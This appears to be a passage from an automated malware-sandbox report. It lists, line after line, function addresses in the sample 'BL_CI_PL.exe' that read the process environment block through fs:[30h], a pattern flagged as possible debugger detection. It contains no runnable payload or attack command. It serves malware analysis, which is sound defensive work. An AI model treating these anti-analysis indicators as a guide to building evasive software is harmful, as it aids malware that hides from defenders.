        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FE1F mov eax, dword ptr fs:[00000030h]10_2_1E92FE1F
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FE1F mov eax, dword ptr fs:[00000030h]10_2_1E92FE1F
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FE1F mov eax, dword ptr fs:[00000030h]10_2_1E92FE1F
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FE1F mov eax, dword ptr fs:[00000030h]10_2_1E92FE1F
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ABE18 mov ecx, dword ptr fs:[00000030h]10_2_1E8ABE18
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E8E15 mov eax, dword ptr fs:[00000030h]10_2_1E8E8E15
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984E03 mov eax, dword ptr fs:[00000030h]10_2_1E984E03
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3E14 mov eax, dword ptr fs:[00000030h]10_2_1E8B3E14
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3E14 mov eax, dword ptr fs:[00000030h]10_2_1E8B3E14
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3E14 mov eax, dword ptr fs:[00000030h]10_2_1E8B3E14
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E946E30 mov eax, dword ptr fs:[00000030h]10_2_1E946E30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E946E30 mov eax, dword ptr fs:[00000030h]10_2_1E946E30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E945E30 mov eax, dword ptr fs:[00000030h]10_2_1E945E30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E945E30 mov ecx, dword ptr fs:[00000030h]10_2_1E945E30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E945E30 mov eax, dword ptr fs:[00000030h]10_2_1E945E30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E945E30 mov eax, dword ptr fs:[00000030h]10_2_1E945E30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E945E30 mov eax, dword ptr fs:[00000030h]10_2_1E945E30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E945E30 mov eax, dword ptr fs:[00000030h]10_2_1E945E30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E978E26 mov eax, dword ptr fs:[00000030h]10_2_1E978E26
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E978E26 mov eax, dword ptr fs:[00000030h]10_2_1E978E26
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E978E26 mov eax, dword ptr fs:[00000030h]10_2_1E978E26
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E978E26 mov eax, dword ptr fs:[00000030h]10_2_1E978E26
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ECE3F mov eax, dword ptr fs:[00000030h]10_2_1E8ECE3F
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B2E32 mov eax, dword ptr fs:[00000030h]10_2_1E8B2E32
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92DE50 mov eax, dword ptr fs:[00000030h]10_2_1E92DE50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92DE50 mov eax, dword ptr fs:[00000030h]10_2_1E92DE50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92DE50 mov ecx, dword ptr fs:[00000030h]10_2_1E92DE50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92DE50 mov eax, dword ptr fs:[00000030h]10_2_1E92DE50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92DE50 mov eax, dword ptr fs:[00000030h]10_2_1E92DE50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DEE48 mov eax, dword ptr fs:[00000030h]10_2_1E8DEE48
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AFE40 mov eax, dword ptr fs:[00000030h]10_2_1E8AFE40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AAE40 mov eax, dword ptr fs:[00000030h]10_2_1E8AAE40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AAE40 mov eax, dword ptr fs:[00000030h]10_2_1E8AAE40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AAE40 mov eax, dword ptr fs:[00000030h]10_2_1E8AAE40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ADE45 mov eax, dword ptr fs:[00000030h]10_2_1E8ADE45
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ADE45 mov ecx, dword ptr fs:[00000030h]10_2_1E8ADE45
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ABE60 mov eax, dword ptr fs:[00000030h]10_2_1E8ABE60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ABE60 mov eax, dword ptr fs:[00000030h]10_2_1E8ABE60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96EE78 mov eax, dword ptr fs:[00000030h]10_2_1E96EE78
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984E62 mov eax, dword ptr fs:[00000030h]10_2_1E984E62
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D mov eax, dword ptr fs:[00000030h]10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D mov eax, dword ptr fs:[00000030h]10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D mov eax, dword ptr fs:[00000030h]10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D mov eax, dword ptr fs:[00000030h]10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D mov eax, dword ptr fs:[00000030h]10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D mov eax, dword ptr fs:[00000030h]10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D mov eax, dword ptr fs:[00000030h]10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D mov eax, dword ptr fs:[00000030h]10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D mov eax, dword ptr fs:[00000030h]10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D mov eax, dword ptr fs:[00000030h]10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D mov eax, dword ptr fs:[00000030h]10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D mov eax, dword ptr fs:[00000030h]10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D mov eax, dword ptr fs:[00000030h]10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D mov eax, dword ptr fs:[00000030h]10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B1E70 mov eax, dword ptr fs:[00000030h]10_2_1E8B1E70
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ECE70 mov eax, dword ptr fs:[00000030h]10_2_1E8ECE70
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E7E71 mov eax, dword ptr fs:[00000030h]10_2_1E8E7E71
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E938F8B mov eax, dword ptr fs:[00000030h]10_2_1E938F8B
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E938F8B mov eax, dword ptr fs:[00000030h]10_2_1E938F8B
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E938F8B mov eax, dword ptr fs:[00000030h]10_2_1E938F8B
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8C0F90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0F90 mov ecx, dword ptr fs:[00000030h]10_2_1E8C0F90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8C0F90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8C0F90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8C0F90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8C0F90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8C0F90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8C0F90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8C0F90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8C0F90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8C0F90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8C0F90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8C0F90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DBF93 mov eax, dword ptr fs:[00000030h]10_2_1E8DBF93
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B1FAA mov eax, dword ptr fs:[00000030h]10_2_1E8B1FAA
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E8FBC mov eax, dword ptr fs:[00000030h]10_2_1E8E8FBC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B4FB6 mov eax, dword ptr fs:[00000030h]10_2_1E8B4FB6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DCFB0 mov eax, dword ptr fs:[00000030h]10_2_1E8DCFB0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DCFB0 mov eax, dword ptr fs:[00000030h]10_2_1E8DCFB0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96EFD3 mov eax, dword ptr fs:[00000030h]10_2_1E96EFD3
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ABFC0 mov eax, dword ptr fs:[00000030h]10_2_1E8ABFC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FFDC mov eax, dword ptr fs:[00000030h]10_2_1E92FFDC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FFDC mov eax, dword ptr fs:[00000030h]10_2_1E92FFDC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FFDC mov eax, dword ptr fs:[00000030h]10_2_1E92FFDC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FFDC mov ecx, dword ptr fs:[00000030h]10_2_1E92FFDC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FFDC mov eax, dword ptr fs:[00000030h]10_2_1E92FFDC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FFDC mov eax, dword ptr fs:[00000030h]10_2_1E92FFDC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A9FD0 mov eax, dword ptr fs:[00000030h]10_2_1E8A9FD0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931FC9 mov eax, dword ptr fs:[00000030h]10_2_1E931FC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984FFF mov eax, dword ptr fs:[00000030h]10_2_1E984FFF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D8FFB mov eax, dword ptr fs:[00000030h]10_2_1E8D8FFB
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBF0C mov eax, dword ptr fs:[00000030h]10_2_1E8EBF0C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBF0C mov eax, dword ptr fs:[00000030h]10_2_1E8EBF0C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBF0C mov eax, dword ptr fs:[00000030h]10_2_1E8EBF0C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984F1D mov eax, dword ptr fs:[00000030h]10_2_1E984F1D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CCF00 mov eax, dword ptr fs:[00000030h]10_2_1E8CCF00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CCF00 mov eax, dword ptr fs:[00000030h]10_2_1E8CCF00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FF03 mov eax, dword ptr fs:[00000030h]10_2_1E92FF03
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FF03 mov eax, dword ptr fs:[00000030h]10_2_1E92FF03
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FF03 mov eax, dword ptr fs:[00000030h]10_2_1E92FF03
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F0F16 mov eax, dword ptr fs:[00000030h]10_2_1E8F0F16
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F0F16 mov eax, dword ptr fs:[00000030h]10_2_1E8F0F16
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F0F16 mov eax, dword ptr fs:[00000030h]10_2_1E8F0F16
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F0F16 mov eax, dword ptr fs:[00000030h]10_2_1E8F0F16
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E938F3C mov eax, dword ptr fs:[00000030h]10_2_1E938F3C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E938F3C mov eax, dword ptr fs:[00000030h]10_2_1E938F3C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E938F3C mov ecx, dword ptr fs:[00000030h]10_2_1E938F3C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E938F3C mov ecx, dword ptr fs:[00000030h]10_2_1E938F3C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CDF36 mov eax, dword ptr fs:[00000030h]10_2_1E8CDF36
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CDF36 mov eax, dword ptr fs:[00000030h]10_2_1E8CDF36
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CDF36 mov eax, dword ptr fs:[00000030h]10_2_1E8CDF36
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CDF36 mov eax, dword ptr fs:[00000030h]10_2_1E8CDF36
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AFF30 mov edi, dword ptr fs:[00000030h]10_2_1E8AFF30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96AF50 mov ecx, dword ptr fs:[00000030h]10_2_1E96AF50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96BF4D mov eax, dword ptr fs:[00000030h]10_2_1E96BF4D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E906F70 mov eax, dword ptr fs:[00000030h]10_2_1E906F70
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984F7C mov eax, dword ptr fs:[00000030h]10_2_1E984F7C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96EF66 mov eax, dword ptr fs:[00000030h]10_2_1E96EF66
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AEF79 mov eax, dword ptr fs:[00000030h]10_2_1E8AEF79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AEF79 mov eax, dword ptr fs:[00000030h]10_2_1E8AEF79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AEF79 mov eax, dword ptr fs:[00000030h]10_2_1E8AEF79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ABF70 mov eax, dword ptr fs:[00000030h]10_2_1E8ABF70
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B1F70 mov eax, dword ptr fs:[00000030h]10_2_1E8B1F70
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAF72 mov eax, dword ptr fs:[00000030h]10_2_1E8DAF72
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96FC95 mov eax, dword ptr fs:[00000030h]10_2_1E96FC95
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E959C98 mov ecx, dword ptr fs:[00000030h]10_2_1E959C98
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E959C98 mov eax, dword ptr fs:[00000030h]10_2_1E959C98
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E959C98 mov eax, dword ptr fs:[00000030h]10_2_1E959C98
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E959C98 mov eax, dword ptr fs:[00000030h]10_2_1E959C98
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7C85 mov eax, dword ptr fs:[00000030h]10_2_1E8A7C85
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7C85 mov eax, dword ptr fs:[00000030h]10_2_1E8A7C85
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7C85 mov eax, dword ptr fs:[00000030h]10_2_1E8A7C85
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7C85 mov eax, dword ptr fs:[00000030h]10_2_1E8A7C85
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7C85 mov eax, dword ptr fs:[00000030h]10_2_1E8A7C85
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E933C80 mov ecx, dword ptr fs:[00000030h]10_2_1E933C80
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B7C95 mov eax, dword ptr fs:[00000030h]10_2_1E8B7C95
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B7C95 mov eax, dword ptr fs:[00000030h]10_2_1E8B7C95
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E943CD4 mov eax, dword ptr fs:[00000030h]10_2_1E943CD4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E943CD4 mov eax, dword ptr fs:[00000030h]10_2_1E943CD4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E943CD4 mov ecx, dword ptr fs:[00000030h]10_2_1E943CD4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E943CD4 mov eax, dword ptr fs:[00000030h]10_2_1E943CD4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E943CD4 mov eax, dword ptr fs:[00000030h]10_2_1E943CD4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E9CCF mov eax, dword ptr fs:[00000030h]10_2_1E8E9CCF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BFCC9 mov eax, dword ptr fs:[00000030h]10_2_1E8BFCC9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E935CD0 mov eax, dword ptr fs:[00000030h]10_2_1E935CD0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A6CC0 mov eax, dword ptr fs:[00000030h]10_2_1E8A6CC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A6CC0 mov eax, dword ptr fs:[00000030h]10_2_1E8A6CC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A6CC0 mov eax, dword ptr fs:[00000030h]10_2_1E8A6CC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984CD2 mov eax, dword ptr fs:[00000030h]10_2_1E984CD2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E6CC0 mov eax, dword ptr fs:[00000030h]10_2_1E8E6CC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D8CDF mov eax, dword ptr fs:[00000030h]10_2_1E8D8CDF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D8CDF mov eax, dword ptr fs:[00000030h]10_2_1E8D8CDF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CDCD1 mov eax, dword ptr fs:[00000030h]10_2_1E8CDCD1
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CDCD1 mov eax, dword ptr fs:[00000030h]10_2_1E8CDCD1
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CDCD1 mov eax, dword ptr fs:[00000030h]10_2_1E8CDCD1
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ECCD1 mov ecx, dword ptr fs:[00000030h]10_2_1E8ECCD1
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ECCD1 mov eax, dword ptr fs:[00000030h]10_2_1E8ECCD1
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ECCD1 mov eax, dword ptr fs:[00000030h]10_2_1E8ECCD1
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92CCF0 mov ecx, dword ptr fs:[00000030h]10_2_1E92CCF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7CF1 mov eax, dword ptr fs:[00000030h]10_2_1E8A7CF1
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3CF0 mov eax, dword ptr fs:[00000030h]10_2_1E8B3CF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3CF0 mov eax, dword ptr fs:[00000030h]10_2_1E8B3CF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E947CE8 mov eax, dword ptr fs:[00000030h]10_2_1E947CE8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E930CEE mov eax, dword ptr fs:[00000030h]10_2_1E930CEE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DECF3 mov eax, dword ptr fs:[00000030h]10_2_1E8DECF3
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DECF3 mov eax, dword ptr fs:[00000030h]10_2_1E8DECF3
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E2C10 mov eax, dword ptr fs:[00000030h]10_2_1E8E2C10
